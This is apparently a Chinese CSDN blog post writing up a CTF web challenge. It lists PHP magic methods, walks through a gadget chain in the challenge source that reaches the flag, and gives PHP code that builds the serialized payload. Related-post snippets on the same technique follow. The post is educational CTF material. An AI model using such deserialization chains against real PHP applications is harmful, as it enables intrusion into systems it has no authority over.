CTF里WEB题中的POP链

最新推荐文章于 2024-03-27 16:45:38 发布
最新推荐文章于 2024-03-27 16:45:38 发布
阅读量381 收藏
点赞数 1
文章标签: 前端 android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dangejinghong/article/details/132645729
版权

在解释源代码之前,我们需要先了解一下这个php的魔术方法

  1. __construct(),类的构造函数

  2. __destruct(),类的析构函数

  3. __call(),在对象中调用一个不可访问方法时调用

  4. __callStatic(),用静态方式中调用一个不可访问方法时调用

  5. __get(),获得一个类的成员变量时调用

  6. __set(),设置一个类的成员变量时调用

  7. __isset(),当对不可访问属性调用isset()或empty()时调用

  8. __unset(),当对不可访问属性调用unset()时被调用。

  9. __sleep(),执行serialize()时,先会调用这个函数

  10. __wakeup(),执行unserialize()时,先会调用这个函数

  11. __toString(),类被当成字符串时的回应方法

  12. __invoke(),调用函数的方式调用一个对象时的回应方法

  13. __set_state(),调用var_export()导出类时,此静态方法会被调用。

  14. __clone(),当对象复制完成时调用

  15. __autoload(),尝试加载未定义的类

  16. __debugInfo(),打印所需调试信息

然后再来看源代码

<?php
include("./xxxiscc.php");
class boy {
public $like;
public function __destruct() {
 echo "能请你喝杯奶茶吗?<br>";
 @$this->like->make_friends();
}
public function __toString() {
 echo "拱火大法好<br>";
 return $this->like->string;
}
}
​
class girl {
private $boyname;
public function __call($func, $args) {
 echo "我害羞羞<br>";
 isset($this->boyname->name); 
}
}
​
class helper {
private $name;
private $string;
public function __construct($string) {
 $this->string = $string;
}
public function __isset($val) {
 echo "僚机上线<br>";
 echo $this->name;
}
public function __get($name) {
 echo "僚机不懈努力<br>";
 $var = $this->$name;
 $var[$name]();
}
}
class love_story {
public function love() {
 echo "爱情萌芽<br>";
 array_walk($this, function($make, $colo){
   echo "坠入爱河,给你爱的密码<br>";
   if ($make[0] === "girl_and_boy" && $colo === "fall_in_love") {
     global $flag;
     echo $flag;
   }
 });
}
}
​
if (isset($_GET["iscc"])) {
$a=unserialize($_GET['iscc']);
} else {
highlight_file(__FILE__);
}

当这个php代码开始走的时候,先是__destruct()魔术方法被触发,然后echo出句子,当进行到

$this->like->make_friends(); 发现它调用了一个make_friends方法,但是这个方法不存在,所以触发call()魔术方法,在call()中,echo出句子后,进行isset($this->boyname->name);会发现其触发了__isset()魔术方法

因为我们可以从代码里看到这俩个属性都是私有的,不可访问。

那么我们继续走,当进行isset()魔术方法时,echo出它的句子,然后发现其echo $this->name;发现name前没加$,意思为name被当成字符串,所以会发现其触发__toString()魔术方法

echo出句子,然后进行return $this->like->string;

image-20230514203808378

string是类helper里的成员变量。所以触发了__get()魔术方法。echo出句子后

$var = $this->$name; $var 【$name](); 从当前对象实例中获取一个变量,使用$name变量中指定的变量名称。然后,它尝试调用检索到的变量上的方法,使用相同的$name值作为方法名。(还是有点不太清楚)然后就是往下走类。

满足$colo强等于"fall_in_love",且数组[0]="girl_and_boy";

所以就可以构建出一个链表并以此来写出PHP代码

class boy{
 public $like;
}
class girl{
 public $boyname;
}
class helper{
 public $name;
 public $string;
 public function __construct(){
     $this->string=array("string"=>array(new love_story(),"love"));
 }//这是一个公共函数构造器(__construct),它需要一个字符串作为参数。在函数内部,将传入的字符串赋值给类的属性 $this->string。其中包含一个名为 "string" 的属性,它是一个数组,该数组包含了一个新的 love_story 对象和一个字符串 "love"
}
class love_story{
 public $fall_in_love=array(0=>'girl_and_boy');
}

上半部分就是将类进行书写。以及满足love_story类中的条件。

$b1 = new boy();
$b = new boy();
$g = new girl();
$h1 = new helper();
$h = new helper();
$l = new love_story();
$h->string=array("string"=>array(new love_story(),"love"));
$b->like=$h;
$h1->name=$b;
$g->boyname=$h1;
$b1->like=$g;
echo serialize($b1);

下半函数就是我们的链表,也就是上面我所说的按照那个顺序一步一步走,最后到达

$h->string=array("string"=>array(new love_story(),"love")); 然后get传参iscc=序列化后的结果,得到线索

从这些被echo的句子也能看出链表。

Whyyyyy‘
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[网络安全提高篇] 一一〇.强网杯CTFWeb Write-Up(上) 寻宝、赌徒、EasyWebpop_master
杨秀璋的专栏
06-15 3万+
强网杯作为国内最好的CTF比赛之一,搞安全的博友和初学者都可以去尝试下。整体而言,比赛目的水准仍然非常高,尤其是RE和PWN,包括Web,所以还是有很多知识点值得我们学习的。最后,非常感谢参考文献的大佬们,尤其是Nu1L战队(推荐VX关注他们),也感谢许多参加比赛的伙伴和博友们。如果您是一名安全初学者,不妨多参加比赛,每一次CTF比赛都能让我们学到很多东西,即使是赛后的WP,也能成长不少。同时有个遗憾,比赛完后目不能打开复现,将就看吧。
ctf-pop
qq_32445755的博客
05-15 1868
POP链就是利用魔法方法在面进行多次跳转然后获取敏感数据的一种payload,实战应用范围暂时没遇到,不过在CTF比赛经常出现这样的目,同时也经常与反序列化一起考察,可以理解为是反序列化的一种拓展,泛用性更强,涉及到的魔法方法也更多。 __sleep() //使用serialize时触发 __destruct() //对象被销毁时触发 __call() //在对象上下文调用不可访问的方法时触发 __callStatic() //在静态上下文调用不可访问的方法时触发 __get() //用于从不可
php反序列化——pop链构造[SWPUCTF 2021 新生赛]pop [NISACTF 2022]babyserialize
最新发布
m0_73756016的博客
03-27 808
class w44m的Getflag() -> class w33m的__toString() -> class w22m的 __destruct()$this->mw00->{$this->w22m}();的意思是调用当前对象的 w00m 属性名为 $this->w22m 的方法。所以反推法第一步就是要调用Getflag()函数 找到$this->w00m->{$this->w22m}();mw00=w44m w22m = Getflag()即可调用Getflag()这的链条是(反推)
CTF-PHP反序列化漏洞3-构造POP
Eason_LYC安全白帽子的成长博客
05-08 1928
PHP反序列化攻击是一种常见的Web攻击,攻击者通过构造恶意的序列化数据,将其传递给目标服务器,从而导致服务器执行非预期的操作。而Pop链则是一种利用PHP反序列化漏洞的攻击方式,可以在未授权的情况下执行任意代码。《CTF基础入门系列》专栏文章打破以往CTF速成或就模式。采用系统讲解基础知识+入门目练习+真讲解方式。让刚接触CTF的读者真正掌握CTF各类型知识点,为后续自学或快速刷备赛,打下坚实的基础~
[WEB]pop
qq_61109509的博客
04-17 599
文章目录魔法方法小技巧分析 学长给的一道 魔法方法 __wakeup() //执行unserialize()时,先会调用这个函数 __sleep() //执行serialize()时,先会调用这个函数,session反序列化同样会调用 __destruct() //对象被销毁时触发 __call() //在对象上下文调用不可访问的方法时触发 __callStatic() //在静态上下文调用不可访问的方法时触发 __get() //用于从不可访问的属性读取数据或者不存在这个键都会调用此方法 __set
BMZCTF-WEB-simple_pop
qq_24033605的博客
05-24 265
simple_pop php代码审计: <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the beijing")){ echo "<br><h1>".file_get_contents($text,'r')."&
CTF库超详细资源合集
06-14
在传统的CTF线上⽐赛Web⽬是主要的型之⼀,相较于⼆进制、逆向等类型的⽬,参赛者不需掌握系统底层知识;相较于密码学、杂项问,不需具特别强的编程能⼒,故⼊门较为容易。Web⽬常见的漏洞类型...
CTFWeb各种目的解姿势PPT模板
02-21
CTFWeb各种目的解姿势PPT模板
ctfhub web全部做记录(持续跟新)
01-08
信息泄露 ...url = http://challenge-c93f188d4781b829.sandbox.ctfhub.com:10080/ a = ['web','website','backup','back','www','wwwroot','temp'] b = ['tar','tar.gz','zip','rar'] for i in a: fo
ctfCTF理论考核及答案
07-05
1. **文件扩展名**:文件扩展名是标识文件类型的重要部分,例如在`readme.txt`,`.txt`是扩展名,它告诉操作系统如何处理这个文件。选项C是正确答案。 2. **HTML语言**:HTML(HyperText Markup Language)是一种...
领航杯 CTF 2021 决赛 真 7z
12-07
领航杯 CTF 2021 决赛
POP链挖掘
萍水间人的小天地
02-19 276
Laravel mockery组件 exp: <?php namespace Illuminate\Broadcasting{ class PendingBroadcast { protected $event; protected $events; public function __construct($events,$event) ...
pop链例
zhhhb1005的博客
05-01 852
目录 例 流程 exp pop链就是利用魔法方法在面进行多次跳转然后获取敏感数据的一种payload,实战应用范围暂时没遇到,不过在CTF比赛经常出现这样的目,同时也经常与反序列化一起考察,可以理解为是反序列化的一种拓展,泛用性更强,涉及到的魔法方法也更多。 例 Happy New Year~ MAKE A WISH <?php echo 'Happy New Year~ MAKE A WISH<br>'; if(isset($_GET['wish'...
BMZCTF simple_pop
weixin_52268949的博客
02-14 209
simple_pop 打开目得到源码 这边是php伪协议的考点,需要去读取useless.php 解码获得源码 <?php class Modifier { protected $var; public function append($value){ include($value);//flag.php } public function __invoke(){ $this->append($this->var)
CTF Web复现』BUUCTF-[EIS 2019]EzPOP
Ho1aAs‘s Blog
10-07 1282
# 利用点 - base64 + filter协议绕过死亡exit
Web POP
Light_shoot的博客
10-22 118
1>PHP序列化是将变量转换为可保存或传输的字符串的过程;反序列化就是在适当的时候把这个字符串再转化成原来的变量使用。这两个过程结合起来,可以轻松地存储和传输数据,使程序更具维护性。PHP反序列化是一种将序列化数据转换为可用的PHP数据结构的过程。PHP反序列化可以帮助PHP开发人员轻松地存储和传输复杂的和多维度的结构。PHP反序列化可以把一些PHP格式的数据,比如:数组,对象,布尔值,等,反序列化为字符串或字节流,并将这些反序列化信息存储在文件,或者在网络间传输。
PHP反序列化--简单ctf--pop链(thinkphp5.1.X)漏洞复现
cainiao17441898的博客
07-07 4383
前言: PHP 将所有以 __(两个下划线)开头的类方法保留为魔术方法,这些都是PHP内置的方法。 __construct 当一个对象创建时被调用 __destruct 当一个对象销毁时被调用 __wakeup() 使用unserialize时触发 __sleep() 使用serialize时触发 __call() 在对象上下文调用不可访问的方法时触发 __callStatic() 在静态上下文调用不可访问的方法时触发 __get() 用于从不可访问的属性读取数据 __set() 用于将数据写入不可访
记一道ctf的反序列化POP链构造
weixin_43263451的博客
10-16 1947
<?php class Tiger{ public $string; protected $var; public function __toString(){ return $this->string; } public function boss($value){ @eval($value); } public function __invoke(){ $this->boss(...
ctfweb有什么技巧
04-05
作为AI语言模型,我并不会CTF,但以下是一些通用的技巧,可以帮助你在CTFWeb取得成功: 1. 深入了解HTTP协议和Web应用程序的基础知识,包括Cookie、Session、HTTP请求头和响应头等。 2. 熟悉基本的Web漏洞,如SQL注入、XSS、CSRF、文件包含、命令注入等。 3. 熟练使用Burp Suite等工具进行渗透测试和漏洞分析。 4. 熟悉各种Web框架和技术,如PHP、Python、Ruby on Rails等,并了解其安全问。 5. 使用各种搜索引擎和漏洞库来查找可能的漏洞和解决方案。 6. 阅读源代码并理解其工作原理,以便找到可能的漏洞。 7. 了解常见的Web防御技术,如WAF、CSP、HSTS、HTTPS等,并尝试绕过它们。 8. 提高自己的编程能力和代码审计技能,以便更好地理解代码的漏洞和解决方案。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值